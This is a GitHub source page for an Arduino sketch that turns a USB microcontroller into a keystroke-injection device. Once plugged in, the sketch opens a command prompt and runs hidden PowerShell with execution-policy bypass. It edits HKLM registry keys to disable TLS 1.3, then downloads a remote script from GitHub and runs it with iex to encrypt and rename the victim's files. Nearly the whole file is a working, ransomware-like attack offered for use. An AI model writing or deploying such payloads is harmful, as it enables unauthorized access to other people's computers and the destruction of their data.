-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathsingle_file_enc_generic.ino
98 lines (90 loc) · 4.46 KB
/
single_file_enc_generic.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
/*
Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
For more information see: https://github.com/pcmarcon/malduino-payload-sample
*/
#include "Keyboard.h"
#include "Mouse.h"
#define blinkInterval 50
#define ledPin 13 // generic USB ATMEGA32U4 hw use ledpin 13
int defaultDelay = 4;
int defaultCharDelay = 5;
int rMin = 0;
int rMax = 100;
bool ledOn = true;
void typeKey(int key) {
Keyboard.press(key);
delay(defaultCharDelay);
Keyboard.release(key);
}
void setup() {
pinMode(ledPin, OUTPUT);
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
delay(1000);
digitalWrite(ledPin, HIGH);
delay(1000);
digitalWrite(ledPin, LOW);
delay(10000); // extra 10s to help uploading new firmware
Keyboard.begin();
Mouse.begin();
/* ----- Begin-Payload -----*/
delay(1000); // extra 1s delay, can be adjusted if needed
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press(114);
Keyboard.releaseAll();
delay(500);
Keyboard.print("cmd");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(1000);
Keyboard.print("cd %LOCALAPPDATA%");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
// change windows registry ssl/tsl settings to allow executing powershell script directly from github or other url
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL\\Protocols\\TLS 1.3\\Client' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SCHANNEL\\\\Protocols\\\\TLS 1.3\\\\Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}");
delay(defaultDelay);
typeKey(KEY_RETURN);
// run encryption script directly from github
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"$type='single_enc'; $file='test.txt'; $file_path='h:'; $show_screen='no'; (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/payload.ps1') | iex\"");
delay(defaultDelay);
typeKey(KEY_RETURN);
delay(defaultDelay);
Keyboard.print("powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \"$type='multi_ren'; $file='.db'; $file_path='h:'; $show_screen='yes'; (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/payload.ps1') | iex\"");
delay(defaultDelay);
typeKey(KEY_RETURN);
/* ----- End-Payload -----*/
Keyboard.end();
}
void loop() {
ledOn = !ledOn;
digitalWrite(ledPin, ledOn);
delay(blinkInterval);
}